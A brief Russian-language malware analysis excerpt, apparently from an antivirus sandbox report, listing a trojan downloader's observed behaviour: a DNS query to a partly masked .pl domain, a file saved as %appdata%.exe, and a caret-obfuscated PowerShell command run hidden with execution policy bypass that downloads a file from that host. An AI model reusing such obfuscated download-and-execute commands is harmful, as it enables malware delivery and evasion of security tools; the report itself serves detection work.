Техническая информация
- http://lt##.##strecord93.pl/file/hon.vfr как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pow^Er^SheLL.^ExE ^-E^X^ecUTIo^NPol^iCy ^By^p^ass -^NO^prO^fIL^e -W^I^n^DOws^TY^le H^iddeN^ (nEw^-o^bJ^E^ct SysTEM.Net^.W^eBCl^IEN^T).^Dow^nLO^aDfile(^'http://lt##.##strecord...
- DNS ASK lt##.##strecord93.pl
- '<SYSTEM32>\cmd.exe' /C "pow^Er^SheLL.^ExE ^-E^X^ecUTIo^NPol^iCy ^By^p^ass -^NO^prO^fIL^e -W^I^n^DOws^TY^le H^iddeN^ (nEw^-o^bJ^E^ct SysTEM.Net^.W^eBCl^IEN^T).^Dow^nLO^aDfile(^'http://lt##.##strecord...' (со скрытым окном)